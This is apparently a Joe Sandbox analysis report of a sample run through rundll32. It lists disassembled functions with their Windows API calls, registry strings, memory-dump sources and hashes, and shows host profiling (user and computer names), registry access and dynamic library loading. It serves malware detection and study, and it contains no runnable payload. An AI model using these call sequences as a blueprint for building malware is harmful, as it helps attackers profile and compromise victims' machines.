                                Function 0347EC00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0347EC1B
                                • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0347ECD3
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0347EC69
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0347EC82
                                • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0347ECA1
                                • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0347ECB3
                                • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0347ECBB
                                Strings
                                • Software\Microsoft\WAB\DLLPath, xrefs: 0347EC0C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                • String ID: Software\Microsoft\WAB\DLLPath
                                • API String ID: 1628847533-3156921957
                                • Opcode ID: c82f270adf5fa376baf2f8fe0d5f59e35907cf84dd5875f624eb9c100b66626f
                                • Instruction ID: fed06468c4eb6e66540afdc7ae5b2bb08041436adae5e9b7ab14e5acdf49389e
                                • Opcode Fuzzy Hash: c82f270adf5fa376baf2f8fe0d5f59e35907cf84dd5875f624eb9c100b66626f
                                • Instruction Fuzzy Hash: 58217475900514BFDB21EB69DC48CDEBBBDEB45210B1502E7F811AF214D7314A85DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03487736 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL ref: 03487777
                                • memset.NTDLL ref: 0348778B
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • GetCurrentThreadId.KERNEL32 ref: 03487818
                                • GetCurrentThread.KERNEL32 ref: 0348782B
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 034878D2
                                • Sleep.KERNEL32(0000000A), ref: 034878DC
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03487902
                                • HeapFree.KERNEL32(00000000,?), ref: 03487930
                                • HeapFree.KERNEL32(00000000,00000018), ref: 03487943
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                • String ID:
                                • API String ID: 1146182784-0
                                • Opcode ID: 9c87d1a0e104feba62c385d8f1fbf0c652c28d6ea5da85442dbb0b0ac5bda97e
                                • Instruction ID: c2ffc36c7bc0c6a09180326626f6b772e11b9a56208e94814bfabd5afca4bdaa
                                • Opcode Fuzzy Hash: 9c87d1a0e104feba62c385d8f1fbf0c652c28d6ea5da85442dbb0b0ac5bda97e
                                • Instruction Fuzzy Hash: F25113B5504341AFE710FF65D88081EBBE8FB98244F144C2FF985EB214E334DA498BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03482812 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034870C3: RtlEnterCriticalSection.NTDLL(0349A428), ref: 034870CB
                                  • Part of subcall function 034870C3: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034870E0
                                  • Part of subcall function 034870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 034870F9
                                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0348284F
                                • memset.NTDLL ref: 03482860
                                • lstrcmpi.KERNEL32(?,?), ref: 034828A0
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 034828CC
                                • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,03488974), ref: 034828E0
                                • memset.NTDLL ref: 034828ED
                                • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03482906
                                • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03482929
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,03488974), ref: 03482946
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                • String ID:
                                • API String ID: 694413484-0
                                • Opcode ID: 9e48a0df9f9a0723cdc717c0a913b9468fa2c119bb6d06885fe0ab678bec64bf
                                • Instruction ID: be5ecebb5e625e7e474e99266fc80af29afe09e575847756115b1ec97b612568
                                • Opcode Fuzzy Hash: 9e48a0df9f9a0723cdc717c0a913b9468fa2c119bb6d06885fe0ab678bec64bf
                                • Instruction Fuzzy Hash: D841BB72E00209AFDF10EFA5CC84B9EBBF9EF09310F14496AE904BF250D774AA458B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C9B5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348C9CC
                                • lstrlen.KERNEL32(?), ref: 0348C9D4
                                • lstrlen.KERNEL32(?), ref: 0348CA3F
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348CA6A
                                • memcpy.NTDLL(00000000,00000002,?), ref: 0348CA7B
                                • memcpy.NTDLL(00000000,?,?), ref: 0348CA91
                                • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0348CAA3
                                • memcpy.NTDLL(00000000,034953E8,00000002,00000000,?,?,00000000,?,?), ref: 0348CAB6
                                • memcpy.NTDLL(00000000,?,00000002), ref: 0348CACB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$lstrlen$AllocateHeap
                                • String ID:
                                • API String ID: 3386453358-0
                                • Opcode ID: 82dd630a4ce9f926ae25803ebb5b9a07b72615c3a57050bd1fe0be0165b5d565
                                • Instruction ID: fb5e24c28ce1a6e90b4fc7ad75bbf480005e7623c599df2c7b01949d4acb88de
                                • Opcode Fuzzy Hash: 82dd630a4ce9f926ae25803ebb5b9a07b72615c3a57050bd1fe0be0165b5d565
                                • Instruction Fuzzy Hash: E8414C76D00209EFCF01DFA9CC80ADEBBB8EF48214F14415BE915AB201E771EA50DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347605B Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034870C3: RtlEnterCriticalSection.NTDLL(0349A428), ref: 034870CB
                                  • Part of subcall function 034870C3: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034870E0
                                  • Part of subcall function 034870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 034870F9
                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034760AC
                                • lstrlen.KERNEL32(00000008,?,?,?,0348F140,00000000,00000000,-00000008), ref: 034760BB
                                • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 034760CD
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,0348F140,00000000,00000000,-00000008), ref: 034760DD
                                • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0348F140,00000000,00000000,-00000008), ref: 034760EF
                                • lstrcpy.KERNEL32(00000020), ref: 03476121
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0347612D
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 03476185
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3746371830-0
                                • Opcode ID: 726199bbc9806310596a1be87faca7ace7892e7d83bf464c32ada666669179ae
                                • Instruction ID: 84b03185f7886304f5ff36a793e01cecf609d73ad89e6c928f6a188feff911da
                                • Opcode Fuzzy Hash: 726199bbc9806310596a1be87faca7ace7892e7d83bf464c32ada666669179ae
                                • Instruction Fuzzy Hash: 45418874400B05EFDB21EF19C848B9ABBFAFF18304F25841BE849AF205D738A954CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348FBF1 Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03485119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0348514B
                                  • Part of subcall function 03485119: HeapFree.KERNEL32(00000000,00000000,?,?,0348FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 03485170
                                  • Part of subcall function 034879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0348FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 034879DC
                                  • Part of subcall function 034879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0348FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 03487A2F
                                • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348FC63
                                • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348FC6B
                                • lstrlen.KERNEL32(?), ref: 0348FC75
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348FC8A
                                • wsprintfA.USER32 ref: 0348FCC6
                                • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0348FCE5
                                • HeapFree.KERNEL32(00000000,?), ref: 0348FCFA
                                • HeapFree.KERNEL32(00000000,?), ref: 0348FD07
                                • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348FD15
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                • String ID:
                                • API String ID: 168057987-0
                                • Opcode ID: f1b67afba28fa632f1e17fbbada058306a6287d53dd4e7b6452d36c4e9e42bca
                                • Instruction ID: 4dc568e05fd546057ef3288c081885b0ab07458ba8dd4ee78e708a335dd4d4b0
                                • Opcode Fuzzy Hash: f1b67afba28fa632f1e17fbbada058306a6287d53dd4e7b6452d36c4e9e42bca
                                • Instruction Fuzzy Hash: 7F319A31600315AFCB11FFA6EC45E5FBBE8EF89210F05096BBA44AE251D77089189B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347F39B Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                • GetLastError.KERNEL32 ref: 0347F3E5
                                • WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                • SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                • GetLastError.KERNEL32 ref: 0347F483
                                • CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                • String ID:
                                • API String ID: 2864405449-0
                                • Opcode ID: 17711284ed6a1a6098a205befced9dbd997e68b3ce7967eeeadc742a1770310f
                                • Instruction ID: ba8c978acf233f554b6fca52eaa2ac6274f153e6fd69b6cbb2d03b0396aca24c
                                • Opcode Fuzzy Hash: 17711284ed6a1a6098a205befced9dbd997e68b3ce7967eeeadc742a1770310f
                                • Instruction Fuzzy Hash: 8B319371900208BFEB11DF65DC49BEEBBB8EF15329F244152F910BA1D0C3704A59DB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0349068D Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,03475674,00000008,?,00000010,00000001,00000000,0000003A), ref: 034906AC
                                • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 034906E0
                                • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 034906E8
                                • GetLastError.KERNEL32 ref: 034906F2
                                • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0349070E
                                • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 03490727
                                • CancelIo.KERNEL32(?), ref: 0349073C
                                • CloseHandle.KERNEL32(?), ref: 0349074C
                                • GetLastError.KERNEL32 ref: 03490754
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                • String ID:
                                • API String ID: 4263211335-0
                                • Opcode ID: f69453f2e1d139a2c2255f2fc95c342d73ab59e559ad290d36d3a100df450a0d
                                • Instruction ID: d76075dbab0375b54db563afa1d096e4b3e9e5dd83c719d2c6403fc97954bb32
                                • Opcode Fuzzy Hash: f69453f2e1d139a2c2255f2fc95c342d73ab59e559ad290d36d3a100df450a0d
                                • Instruction Fuzzy Hash: 61215E31900218BFDF02AF65DC489EF7BB9EF45320B148093F915EA254D7308955CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03481C19 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03481C25
                                • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 03481C3B
                                • _snwprintf.NTDLL ref: 03481C60
                                • CreateFileMappingW.KERNEL32(000000FF,0349A1E8,00000004,00000000,00001000,?), ref: 03481C7C
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03481C8E
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03481CA5
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 03481CC6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03481CCE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 4f2898ce52d8b85b400ad8500606621fa9a26820f05972b574cbabc618a81697
                                • Instruction ID: ad321f1e6e1df3b51eac5f4956f5b916f8e73d43c600893c83d705b2f57c9bf1
                                • Opcode Fuzzy Hash: 4f2898ce52d8b85b400ad8500606621fa9a26820f05972b574cbabc618a81697
                                • Instruction Fuzzy Hash: 5D2102B6A00204BBD722FF68DC06F9E7BE8AB45710F250163F605FF284D6709906CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348CB5A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(00000000,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,00000000,00000000,00000000), ref: 0348CC58
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0348CC7B
                                • lstrcatW.KERNEL32(00000000,00000000), ref: 0348CC83
                                • lstrlenW.KERNEL32(00000000,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?), ref: 0348CCCE
                                • memcpy.NTDLL(00000000,?,?,?), ref: 0348CD36
                                • LocalFree.KERNEL32(?,?), ref: 0348CD4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                • String ID: P
                                • API String ID: 3649579052-3110715001
                                • Opcode ID: ebe8b1f2affc99664dc9ec0ee2565436fb946eb10ffa86a9f689ea252e310412
                                • Instruction ID: e3be2db33ae7b92d4d63507122ac5b85883998dc5700d87498351393edf11b51
                                • Opcode Fuzzy Hash: ebe8b1f2affc99664dc9ec0ee2565436fb946eb10ffa86a9f689ea252e310412
                                • Instruction Fuzzy Hash: 5161697590020AAFCF11FFA9DC89DAFBBF9EF49204B18442BE505AF210D7349D068B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C563 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0349148E: InterlockedIncrement.KERNEL32(00000018), ref: 034914DF
                                  • Part of subcall function 0349148E: RtlLeaveCriticalSection.NTDLL(0616C378), ref: 0349156A
                                • OpenProcess.KERNEL32(00000410,B8F475FF,03482289,00000000,00000000,03482289,0000001C,00000000,00000000,?,?,?,03482289), ref: 0348C5BD
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,03482299,00000104,?,?,?,03482289), ref: 0348C5DB
                                • GetSystemTimeAsFileTime.KERNEL32(03482289), ref: 0348C643
                                • lstrlenW.KERNEL32(C78BC933), ref: 0348C6B8
                                • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0348C6D4
                                • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 0348C6EC
                                  • Part of subcall function 0347F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0347F384
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                • String ID: o
                                • API String ID: 2541713525-252678980
                                • Opcode ID: 63962e7d2ab4001422201dc7df8dc2ceabd918f8795406ee86015ba680aec18e
                                • Instruction ID: 8ed2d06c0bdcca859e7902c76b0a600de55aa7c0c747102ee6aed8fb5156814f
                                • Opcode Fuzzy Hash: 63962e7d2ab4001422201dc7df8dc2ceabd918f8795406ee86015ba680aec18e
                                • Instruction Fuzzy Hash: D8519FB1610706AFDB11EF64D888BAAF7E8FF08304F14452BE905EF254D770E9548BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347A316 Relevance: 12.2, APIs: 8, Instructions: 209timeCOMMON
                                Download Yara Rule
                                APIs
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0347A391
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0347A3BD
                                • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0347A3CD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0347A405
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0347A427
                                • GetShellWindow.USER32 ref: 0347A436
                                  • Part of subcall function 03482986: GetShellWindow.USER32 ref: 034829A4
                                  • Part of subcall function 03482986: GetVersion.KERNEL32 ref: 03482A46
                                  • Part of subcall function 03482986: GetVersion.KERNEL32 ref: 03482A54
                                • GetLastError.KERNEL32(?), ref: 0347A521
                                • CloseHandle.KERNEL32(?), ref: 0347A535
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                                • String ID:
                                • API String ID: 2436285880-0
                                • Opcode ID: 403cf2c6d94976799d321dc79720e06b82956ea4c4d5626eac5f9c766087ccee
                                • Instruction ID: e27a191316d0ed978b12671e21cbc414d6179112026b08236e51aac63cb803e4
                                • Opcode Fuzzy Hash: 403cf2c6d94976799d321dc79720e06b82956ea4c4d5626eac5f9c766087ccee
                                • Instruction Fuzzy Hash: DC717AB1508305AFC750EF64C8888AFBBECFB88354F040A6EF595DB290D730D9458B66
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03477A61 Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348B7A4: RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                  • Part of subcall function 0348B7A4: lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 03477AA6
                                • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03477ABE
                                • HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477B20
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03477B34
                                • WaitForSingleObject.KERNEL32(00000000,?,034887CC,?,?), ref: 03477B86
                                • HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BAF
                                • HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BBF
                                • RegCloseKey.ADVAPI32(?,?,034887CC,?,?), ref: 03477BC8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                • String ID:
                                • API String ID: 3503961013-0
                                • Opcode ID: 70e5e06d5b3e33fdaafabc019486fe649a9316d58922fd7d979c9463d9f1cb52
                                • Instruction ID: 8bee233915350d4b971651af33fa0ed11006c46699daf46b2030b1e25bec4fc2
                                • Opcode Fuzzy Hash: 70e5e06d5b3e33fdaafabc019486fe649a9316d58922fd7d979c9463d9f1cb52
                                • Instruction Fuzzy Hash: 8E41C3B5D00209EFDF11EFA5C8888EEBFB9FF18208F15446BE511BA210D2354A98DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347AAAF Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0347A1A1), ref: 0347AAC5
                                • wsprintfA.USER32 ref: 0347AAED
                                • lstrlen.KERNEL32(?), ref: 0347AAFC
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • wsprintfA.USER32 ref: 0347AB3C
                                • wsprintfA.USER32 ref: 0347AB71
                                • memcpy.NTDLL(00000000,?,?), ref: 0347AB7E
                                • memcpy.NTDLL(00000008,034953E8,00000002,00000000,?,?), ref: 0347AB93
                                • wsprintfA.USER32 ref: 0347ABB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                • String ID:
                                • API String ID: 2937943280-0
                                • Opcode ID: b552b7cb29e13c4697a2d5dd159723e2cefea5298ac172f5dbf8a0cd4b30f9d1
                                • Instruction ID: 3400ef811625c67db67d8c62b994ce5217e852cb286e77d6be45ea69d42ea756
                                • Opcode Fuzzy Hash: b552b7cb29e13c4697a2d5dd159723e2cefea5298ac172f5dbf8a0cd4b30f9d1
                                • Instruction Fuzzy Hash: 1B415371900209EFDB10DF99D885E9EB7FCEF48308B14455AE519EB311E730EA05CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034916C6 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 034916F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03491703
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 03491715
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,03486C8E), ref: 03491739
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 03491747
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0349175E
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 0349176F
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03486C8E), ref: 03491795
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 5d7038c8618e98f14ae0df4cf7d7427106dd1dee6f77a942d6ae4513910062e4
                                • Instruction ID: 0d17d970064b8b9796d03e43af901c5756a795489996b05efd37ae9614d35345
                                • Opcode Fuzzy Hash: 5d7038c8618e98f14ae0df4cf7d7427106dd1dee6f77a942d6ae4513910062e4
                                • Instruction Fuzzy Hash: 9D3101B690020AEFEF00EFB5DD85C6EBBF9FB5424071584AAE505EB204E730DE459B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034863D1 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?), ref: 034863F5
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03486407
                                • wcstombs.NTDLL ref: 03486415
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?), ref: 03486439
                                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0348644E
                                • mbstowcs.NTDLL ref: 0348645B
